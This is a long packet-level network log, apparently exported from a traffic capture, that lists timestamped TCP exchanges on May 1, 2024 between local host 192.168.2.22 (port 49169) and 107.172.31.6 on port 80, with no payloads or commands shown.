                                                      May 1, 2024 14:55:44.958708048 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:44.958713055 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958729982 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958738089 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:44.958745956 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958760977 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958765984 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:44.958776951 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958794117 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958797932 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:44.958811045 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958827019 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958832026 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:44.958842993 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958859921 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958874941 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:44.958884001 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958899021 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958914995 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958923101 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:44.958930969 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:44.958954096 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.119585991 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119647980 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119667053 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119679928 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.119689941 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119708061 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119713068 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.119724035 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119741917 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119754076 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.119764090 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119781017 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119781971 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.119797945 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119816065 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119818926 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.119832039 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119853020 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.119896889 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.119937897 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.119983912 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120031118 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120048046 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120070934 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120074034 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120090961 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120117903 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120124102 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120134115 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120158911 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120167971 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120209932 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120265007 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120280981 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120297909 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120320082 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120321035 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120337963 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120353937 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120358944 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120371103 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120387077 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120395899 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120404005 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120419979 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120424032 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120436907 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120451927 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120456934 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120470047 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120485067 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120492935 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120501995 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120523930 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120527029 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120539904 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120556116 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120563030 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120573044 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120594978 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120595932 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120610952 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120628119 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120630980 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120644093 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120663881 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120672941 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120688915 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120704889 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120718002 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120721102 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120743990 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.120755911 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.120795012 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281073093 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281099081 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281116009 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281142950 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281160116 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281164885 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281196117 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281198978 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281213045 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281227112 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281240940 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281255007 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281259060 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281269073 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281280041 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281281948 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281295061 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281301022 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281306982 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281327963 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281344891 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281346083 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281363010 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281378984 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281387091 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281395912 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281418085 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281419992 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281435966 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281451941 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281455994 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281491041 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281574011 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281750917 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281820059 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281860113 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281900883 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281917095 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281933069 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281949043 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281956911 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281965017 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281980991 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.281987906 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.281996965 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282013893 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282016993 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282030106 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282046080 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282047987 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282063007 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282079935 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282087088 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282097101 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282114029 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282119989 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282130957 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282155037 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282203913 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282219887 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282236099 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282243013 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282252073 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282269955 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282274961 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282285929 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282301903 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282314062 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282318115 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282335043 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282335997 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282351971 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282368898 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282373905 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282407045 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442452908 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442481041 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442497969 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442514896 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442531109 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442533016 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442547083 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442559004 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442564964 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442586899 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442589998 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442606926 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442631006 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442670107 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442694902 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442708969 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442712069 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442728043 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442748070 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442760944 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442778111 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442794085 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442801952 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442811012 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442827940 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442837000 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442843914 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442861080 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442867041 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442878008 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442894936 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442902088 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442934990 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442943096 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442960024 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443000078 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443078041 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443120956 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443145037 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443191051 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443213940 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443231106 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443250895 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443268061 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443284988 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443290949 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443305016 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443326950 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443350077 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443382978 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443384886 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443401098 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443444967 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443448067 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443464041 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443480015 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443501949 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443536043 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443552017 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443568945 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443578959 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443588018 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443609953 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443628073 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443644047 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443661928 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443670034 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443703890 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443703890 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443721056 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443737030 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443753958 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443761110 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443769932 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443795919 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.603817940 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603847980 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603868008 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603883982 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603900909 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603919983 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603935957 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603940964 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.603940964 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.603960991 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603972912 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.603979111 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603995085 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604011059 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604011059 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604027987 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604039907 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604057074 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604070902 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604085922 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604089022 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604115009 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604126930 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604130983 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604146957 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604165077 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604180098 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604182005 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604199886 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604239941 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604257107 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604280949 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604284048 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604296923 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604312897 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604322910 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604330063 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604346037 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604362011 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604373932 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604373932 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604377985 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604393959 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604408979 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604418039 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604425907 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604440928 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604451895 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604459047 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604481936 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604556084 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604573011 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604589939 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604610920 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604614973 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604633093 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604649067 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604654074 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604665041 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604671001 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604681969 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604697943 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604712963 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604713917 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604727030 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604731083 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604747057 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604763031 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604772091 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604779005 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604798079 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604798079 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604814053 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604830980 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604839087 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604847908 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604861975 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604866028 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604882956 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604882956 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604898930 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604903936 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604916096 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604932070 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604937077 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604948044 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604957104 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604971886 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604975939 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604988098 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605004072 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605017900 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605021000 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605030060 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605045080 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605061054 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605071068 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605081081 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605089903 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.605097055 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605113983 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.605123997 CEST4916980192.168.2.22107.172.31.6
